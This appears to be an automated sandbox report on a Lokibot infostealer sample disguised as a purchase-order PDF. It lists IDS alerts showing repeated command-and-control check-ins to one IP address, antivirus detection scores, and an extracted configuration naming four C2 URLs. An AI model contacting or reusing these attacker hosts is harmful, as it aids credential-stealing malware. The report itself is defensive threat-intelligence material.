            2025-03-14T08:04:02.916203+010020216411A Network Trojan was detected192.168.2.549714104.21.96.180TCP
            2025-03-14T08:04:05.008562+010020216411A Network Trojan was detected192.168.2.549715104.21.96.180TCP
            2025-03-14T08:04:06.038405+010020216411A Network Trojan was detected192.168.2.549716104.21.96.180TCP
            2025-03-14T08:04:08.103422+010020216411A Network Trojan was detected192.168.2.549717104.21.96.180TCP
            2025-03-14T08:04:10.335761+010020216411A Network Trojan was detected192.168.2.549718104.21.96.180TCP
            2025-03-14T08:04:12.257051+010020216411A Network Trojan was detected192.168.2.549719104.21.96.180TCP
            2025-03-14T08:04:14.415132+010020216411A Network Trojan was detected192.168.2.549720104.21.96.180TCP
            2025-03-14T08:04:16.401705+010020216411A Network Trojan was detected192.168.2.549729104.21.96.180TCP
            2025-03-14T08:04:18.432261+010020216411A Network Trojan was detected192.168.2.549733104.21.96.180TCP
            2025-03-14T08:04:20.340213+010020216411A Network Trojan was detected192.168.2.549734104.21.96.180TCP
            2025-03-14T08:04:22.237786+010020216411A Network Trojan was detected192.168.2.549735104.21.96.180TCP
            2025-03-14T08:04:24.194250+010020216411A Network Trojan was detected192.168.2.549736104.21.96.180TCP
            2025-03-14T08:04:26.179170+010020216411A Network Trojan was detected192.168.2.549737104.21.96.180TCP
            2025-03-14T08:04:28.241875+010020216411A Network Trojan was detected192.168.2.549738104.21.96.180TCP
            2025-03-14T08:04:30.156668+010020216411A Network Trojan was detected192.168.2.549739104.21.96.180TCP
            2025-03-14T08:04:32.038450+010020216411A Network Trojan was detected192.168.2.549740104.21.96.180TCP
            2025-03-14T08:04:34.257427+010020216411A Network Trojan was detected192.168.2.549741104.21.96.180TCP
            2025-03-14T08:04:36.332008+010020216411A Network Trojan was detected192.168.2.549742104.21.96.180TCP
            2025-03-14T08:04:38.352374+010020216411A Network Trojan was detected192.168.2.549743104.21.96.180TCP
            2025-03-14T08:04:40.274342+010020216411A Network Trojan was detected192.168.2.549744104.21.96.180TCP
            2025-03-14T08:04:42.251113+010020216411A Network Trojan was detected192.168.2.549745104.21.96.180TCP
            2025-03-14T08:04:44.354305+010020216411A Network Trojan was detected192.168.2.549746104.21.96.180TCP
            2025-03-14T08:04:46.417062+010020216411A Network Trojan was detected192.168.2.549747104.21.96.180TCP
            2025-03-14T08:04:48.333985+010020216411A Network Trojan was detected192.168.2.549748104.21.96.180TCP
            2025-03-14T08:04:50.287569+010020216411A Network Trojan was detected192.168.2.549749104.21.96.180TCP
            2025-03-14T08:04:52.243075+010020216411A Network Trojan was detected192.168.2.549758104.21.96.180TCP
            2025-03-14T08:04:54.146249+010020216411A Network Trojan was detected192.168.2.549759104.21.96.180TCP
            2025-03-14T08:04:56.102444+010020216411A Network Trojan was detected192.168.2.549760104.21.96.180TCP
            2025-03-14T08:04:58.093741+010020216411A Network Trojan was detected192.168.2.549761104.21.96.180TCP
            2025-03-14T08:04:59.986075+010020216411A Network Trojan was detected192.168.2.549762104.21.96.180TCP
            2025-03-14T08:05:01.959496+010020216411A Network Trojan was detected192.168.2.549763104.21.96.180TCP
            2025-03-14T08:05:03.755118+010020216411A Network Trojan was detected192.168.2.549764104.21.96.180TCP
            2025-03-14T08:05:05.639399+010020216411A Network Trojan was detected192.168.2.549765104.21.96.180TCP
            2025-03-14T08:05:07.475369+010020216411A Network Trojan was detected192.168.2.549766104.21.96.180TCP
            2025-03-14T08:05:09.350193+010020216411A Network Trojan was detected192.168.2.549767104.21.96.180TCP
            2025-03-14T08:05:11.272633+010020216411A Network Trojan was detected192.168.2.549768104.21.96.180TCP
            2025-03-14T08:05:13.224983+010020216411A Network Trojan was detected192.168.2.549769104.21.96.180TCP
            2025-03-14T08:05:15.225029+010020216411A Network Trojan was detected192.168.2.549770104.21.96.180TCP
            2025-03-14T08:05:17.161078+010020216411A Network Trojan was detected192.168.2.549771104.21.96.180TCP
            2025-03-14T08:05:19.068020+010020216411A Network Trojan was detected192.168.2.549772104.21.96.180TCP
            2025-03-14T08:05:20.881685+010020216411A Network Trojan was detected192.168.2.549773104.21.96.180TCP
            2025-03-14T08:05:22.741187+010020216411A Network Trojan was detected192.168.2.549774104.21.96.180TCP
            2025-03-14T08:05:24.557370+010020216411A Network Trojan was detected192.168.2.549775104.21.96.180TCP
            2025-03-14T08:05:26.335460+010020216411A Network Trojan was detected192.168.2.549776104.21.96.180TCP
            2025-03-14T08:05:28.224730+010020216411A Network Trojan was detected192.168.2.549777104.21.96.180TCP
            2025-03-14T08:05:30.179950+010020216411A Network Trojan was detected192.168.2.549778104.21.96.180TCP
            2025-03-14T08:05:32.038264+010020216411A Network Trojan was detected192.168.2.549779104.21.96.180TCP
            2025-03-14T08:05:33.902856+010020216411A Network Trojan was detected192.168.2.549780104.21.96.180TCP
            2025-03-14T08:05:35.835149+010020216411A Network Trojan was detected192.168.2.549781104.21.96.180TCP
            2025-03-14T08:05:37.812176+010020216411A Network Trojan was detected192.168.2.549782104.21.96.180TCP
            2025-03-14T08:05:39.723929+010020216411A Network Trojan was detected192.168.2.549783104.21.96.180TCP
            2025-03-14T08:05:41.621705+010020216411A Network Trojan was detected192.168.2.549784104.21.96.180TCP
            2025-03-14T08:05:43.584447+010020216411A Network Trojan was detected192.168.2.549785104.21.96.180TCP
            2025-03-14T08:05:45.443904+010020216411A Network Trojan was detected192.168.2.549786104.21.96.180TCP
            2025-03-14T08:05:47.398042+010020216411A Network Trojan was detected192.168.2.549787104.21.96.180TCP
            2025-03-14T08:05:49.214195+010020216411A Network Trojan was detected192.168.2.549788104.21.96.180TCP
            2025-03-14T08:05:51.179112+010020216411A Network Trojan was detected192.168.2.549789104.21.96.180TCP
            2025-03-14T08:05:53.072496+010020216411A Network Trojan was detected192.168.2.549790104.21.96.180TCP
            2025-03-14T08:05:54.991851+010020216411A Network Trojan was detected192.168.2.549791104.21.96.180TCP
            2025-03-14T08:05:56.803930+010020216411A Network Trojan was detected192.168.2.549792104.21.96.180TCP
            2025-03-14T08:05:58.709657+010020216411A Network Trojan was detected192.168.2.549793104.21.96.180TCP
            2025-03-14T08:06:00.649042+010020216411A Network Trojan was detected192.168.2.549794104.21.96.180TCP
            2025-03-14T08:06:02.647337+010020216411A Network Trojan was detected192.168.2.549795104.21.96.180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:04:02.916203+010028257661Malware Command and Control Activity Detected192.168.2.549714104.21.96.180TCP
            2025-03-14T08:04:05.008562+010028257661Malware Command and Control Activity Detected192.168.2.549715104.21.96.180TCP
            2025-03-14T08:04:06.038405+010028257661Malware Command and Control Activity Detected192.168.2.549716104.21.96.180TCP
            2025-03-14T08:04:08.103422+010028257661Malware Command and Control Activity Detected192.168.2.549717104.21.96.180TCP
            2025-03-14T08:04:10.335761+010028257661Malware Command and Control Activity Detected192.168.2.549718104.21.96.180TCP
            2025-03-14T08:04:12.257051+010028257661Malware Command and Control Activity Detected192.168.2.549719104.21.96.180TCP
            2025-03-14T08:04:14.415132+010028257661Malware Command and Control Activity Detected192.168.2.549720104.21.96.180TCP
            2025-03-14T08:04:16.401705+010028257661Malware Command and Control Activity Detected192.168.2.549729104.21.96.180TCP
            2025-03-14T08:04:18.432261+010028257661Malware Command and Control Activity Detected192.168.2.549733104.21.96.180TCP
            2025-03-14T08:04:20.340213+010028257661Malware Command and Control Activity Detected192.168.2.549734104.21.96.180TCP
            2025-03-14T08:04:22.237786+010028257661Malware Command and Control Activity Detected192.168.2.549735104.21.96.180TCP
            2025-03-14T08:04:24.194250+010028257661Malware Command and Control Activity Detected192.168.2.549736104.21.96.180TCP
            2025-03-14T08:04:26.179170+010028257661Malware Command and Control Activity Detected192.168.2.549737104.21.96.180TCP
            2025-03-14T08:04:28.241875+010028257661Malware Command and Control Activity Detected192.168.2.549738104.21.96.180TCP
            2025-03-14T08:04:30.156668+010028257661Malware Command and Control Activity Detected192.168.2.549739104.21.96.180TCP
            2025-03-14T08:04:32.038450+010028257661Malware Command and Control Activity Detected192.168.2.549740104.21.96.180TCP
            2025-03-14T08:04:34.257427+010028257661Malware Command and Control Activity Detected192.168.2.549741104.21.96.180TCP
            2025-03-14T08:04:36.332008+010028257661Malware Command and Control Activity Detected192.168.2.549742104.21.96.180TCP
            2025-03-14T08:04:38.352374+010028257661Malware Command and Control Activity Detected192.168.2.549743104.21.96.180TCP
            2025-03-14T08:04:40.274342+010028257661Malware Command and Control Activity Detected192.168.2.549744104.21.96.180TCP
            2025-03-14T08:04:42.251113+010028257661Malware Command and Control Activity Detected192.168.2.549745104.21.96.180TCP
            2025-03-14T08:04:44.354305+010028257661Malware Command and Control Activity Detected192.168.2.549746104.21.96.180TCP
            2025-03-14T08:04:46.417062+010028257661Malware Command and Control Activity Detected192.168.2.549747104.21.96.180TCP
            2025-03-14T08:04:48.333985+010028257661Malware Command and Control Activity Detected192.168.2.549748104.21.96.180TCP
            2025-03-14T08:04:50.287569+010028257661Malware Command and Control Activity Detected192.168.2.549749104.21.96.180TCP
            2025-03-14T08:04:52.243075+010028257661Malware Command and Control Activity Detected192.168.2.549758104.21.96.180TCP
            2025-03-14T08:04:54.146249+010028257661Malware Command and Control Activity Detected192.168.2.549759104.21.96.180TCP
            2025-03-14T08:04:56.102444+010028257661Malware Command and Control Activity Detected192.168.2.549760104.21.96.180TCP
            2025-03-14T08:04:58.093741+010028257661Malware Command and Control Activity Detected192.168.2.549761104.21.96.180TCP
            2025-03-14T08:04:59.986075+010028257661Malware Command and Control Activity Detected192.168.2.549762104.21.96.180TCP
            2025-03-14T08:05:01.959496+010028257661Malware Command and Control Activity Detected192.168.2.549763104.21.96.180TCP
            2025-03-14T08:05:03.755118+010028257661Malware Command and Control Activity Detected192.168.2.549764104.21.96.180TCP
            2025-03-14T08:05:05.639399+010028257661Malware Command and Control Activity Detected192.168.2.549765104.21.96.180TCP
            2025-03-14T08:05:07.475369+010028257661Malware Command and Control Activity Detected192.168.2.549766104.21.96.180TCP
            2025-03-14T08:05:09.350193+010028257661Malware Command and Control Activity Detected192.168.2.549767104.21.96.180TCP
            2025-03-14T08:05:11.272633+010028257661Malware Command and Control Activity Detected192.168.2.549768104.21.96.180TCP
            2025-03-14T08:05:13.224983+010028257661Malware Command and Control Activity Detected192.168.2.549769104.21.96.180TCP
            2025-03-14T08:05:15.225029+010028257661Malware Command and Control Activity Detected192.168.2.549770104.21.96.180TCP
            2025-03-14T08:05:17.161078+010028257661Malware Command and Control Activity Detected192.168.2.549771104.21.96.180TCP
            2025-03-14T08:05:19.068020+010028257661Malware Command and Control Activity Detected192.168.2.549772104.21.96.180TCP
            2025-03-14T08:05:20.881685+010028257661Malware Command and Control Activity Detected192.168.2.549773104.21.96.180TCP
            2025-03-14T08:05:22.741187+010028257661Malware Command and Control Activity Detected192.168.2.549774104.21.96.180TCP
            2025-03-14T08:05:24.557370+010028257661Malware Command and Control Activity Detected192.168.2.549775104.21.96.180TCP
            2025-03-14T08:05:26.335460+010028257661Malware Command and Control Activity Detected192.168.2.549776104.21.96.180TCP
            2025-03-14T08:05:28.224730+010028257661Malware Command and Control Activity Detected192.168.2.549777104.21.96.180TCP
            2025-03-14T08:05:30.179950+010028257661Malware Command and Control Activity Detected192.168.2.549778104.21.96.180TCP
            2025-03-14T08:05:32.038264+010028257661Malware Command and Control Activity Detected192.168.2.549779104.21.96.180TCP
            2025-03-14T08:05:33.902856+010028257661Malware Command and Control Activity Detected192.168.2.549780104.21.96.180TCP
            2025-03-14T08:05:35.835149+010028257661Malware Command and Control Activity Detected192.168.2.549781104.21.96.180TCP
            2025-03-14T08:05:37.812176+010028257661Malware Command and Control Activity Detected192.168.2.549782104.21.96.180TCP
            2025-03-14T08:05:39.723929+010028257661Malware Command and Control Activity Detected192.168.2.549783104.21.96.180TCP
            2025-03-14T08:05:41.621705+010028257661Malware Command and Control Activity Detected192.168.2.549784104.21.96.180TCP
            2025-03-14T08:05:43.584447+010028257661Malware Command and Control Activity Detected192.168.2.549785104.21.96.180TCP
            2025-03-14T08:05:45.443904+010028257661Malware Command and Control Activity Detected192.168.2.549786104.21.96.180TCP
            2025-03-14T08:05:47.398042+010028257661Malware Command and Control Activity Detected192.168.2.549787104.21.96.180TCP
            2025-03-14T08:05:49.214195+010028257661Malware Command and Control Activity Detected192.168.2.549788104.21.96.180TCP
            2025-03-14T08:05:51.179112+010028257661Malware Command and Control Activity Detected192.168.2.549789104.21.96.180TCP
            2025-03-14T08:05:53.072496+010028257661Malware Command and Control Activity Detected192.168.2.549790104.21.96.180TCP
            2025-03-14T08:05:54.991851+010028257661Malware Command and Control Activity Detected192.168.2.549791104.21.96.180TCP
            2025-03-14T08:05:56.803930+010028257661Malware Command and Control Activity Detected192.168.2.549792104.21.96.180TCP
            2025-03-14T08:05:58.709657+010028257661Malware Command and Control Activity Detected192.168.2.549793104.21.96.180TCP
            2025-03-14T08:06:00.649042+010028257661Malware Command and Control Activity Detected192.168.2.549794104.21.96.180TCP
            2025-03-14T08:06:02.647337+010028257661Malware Command and Control Activity Detected192.168.2.549795104.21.96.180TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeAvira: detected
            Source: 00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeVirustotal: Detection: 35%Perma Link
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeReversingLabs: Detection: 65%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,5_2_00403D74

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49719 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49719 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49719 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49767 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49767 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49767 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49737 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49737 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49737 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49760 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49760 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49760 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49765 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49765 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49765 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49749 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49720 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49749 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49764 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49761 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49764 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49761 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49764 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49743 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49781 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49743 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49743 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49748 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49749 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49781 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49748 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49748 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49739 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49761 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49773 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49781 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49773 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49745 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49773 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49748 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49738 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49764 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49743 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49749 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49767 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49740 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49740 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49781 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49737 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49773 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49740 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49765 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49761 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49716 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49716 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49716 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49717 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49774 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49774 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49774 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49716 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49717 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49734 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49734 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49734 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49774 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49740 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49720 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49720 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49734 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49720 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49729 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49729 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49729 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49742 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49742 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49742 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49729 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49738 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49738 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49742 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49738 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49745 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49759 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49759 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49759 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49759 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49760 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49793 -> 104.21.96.1:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49793 -> 104.21.96.1:80
